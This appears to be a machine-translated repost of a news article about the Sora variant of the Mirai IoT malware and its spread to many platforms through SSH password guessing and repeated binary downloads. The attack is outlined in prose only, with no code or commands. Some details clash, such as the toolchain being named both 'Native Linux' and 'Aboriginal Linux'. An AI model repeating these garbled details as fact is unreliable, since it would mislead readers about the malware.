Mirai IoT Malware Uses Linux to Attack Multiple Platforms

Major changes in the IoT malware landscape. Security researchers have discovered a version of the Mirai IoT malware that can run on a variety of architectures, even on Android devices.

This Mirai malware strain is known as Sora, a strain that was first discovered earlier in the year.

The earliest version was nothing of note, but Sora's original creators soon began developing a Mirai Owari version shortly after Sora's creation.

"SORA is now an abandoned project and I will continue to work on OWARI," said Wicked, author of the Sora malware, in an interview with NewSky Security.

The Mirai Sora variant is making a comeback.

The SORA code has been abandoned, but not forgotten. Ankit Anubhav, a malware analyst at NewSky Security, told Bleeping Computer that the number of Sora detections has been steadily increasing since June. See the chart below.

It seems that other malware authors have improved the SORA code themselves. A Symantec report released today details an improved version of Sora.

New Sora version compiled with native Linux

What stands out about this new Sora release is that the malware authors compiled it using Native Linux, a toolchain utility that gets the source code and generates binaries for a considerable number of platforms.

The author behind this new strain used all of these binaries during his infection in an attempt to spread his Sora variant to as many devices as possible.

Once he accesses the device by guessing its SSH password, the infection routine will download and execute a list of Sora binaries one by one until it finds one suitable for the infected device platform.

This particular variant of Mirai Sora that uses Aboriginal Linux has been around since July. Symantec said they found binaries that were successfully executed on Android and Debian operating systems, a platform that Mirai has never successfully infected before.

Mirai activity is increasing

Troy Mursch, the US security researcher who runs the Mirai tracker, told Bleeping Computer in a private conversation today that Sora isn't the only one seeing a resurgence, and that the number of Mirai attacks has been steadily increasing.

Incoming traffic matching Mirai-like signatures has been observed from 86,063 unique source IPs so far this year. The peak of the #botnet campaign started in June.@circl_luSimilar observations have been made. - Bad Packets Report (@bad_packets) August 1, 2018

"Even if devices are rebooted, they become new targets again because potential vulnerabilities are never patched," Mursch said, pointing to accusations of outdated devices without security patches. Until then, Mirai will continue to plague the larger IoT landscape and the Internet as a whole.

3、Python Languages 2017 YearEnd Summary
4、Too inefficient Try these apps
5、Is it imminent that AI will change lives The driver and anchor had some mixed emotions

    已推荐到看一看 和朋友分享想法
    最多200字,当前共 发送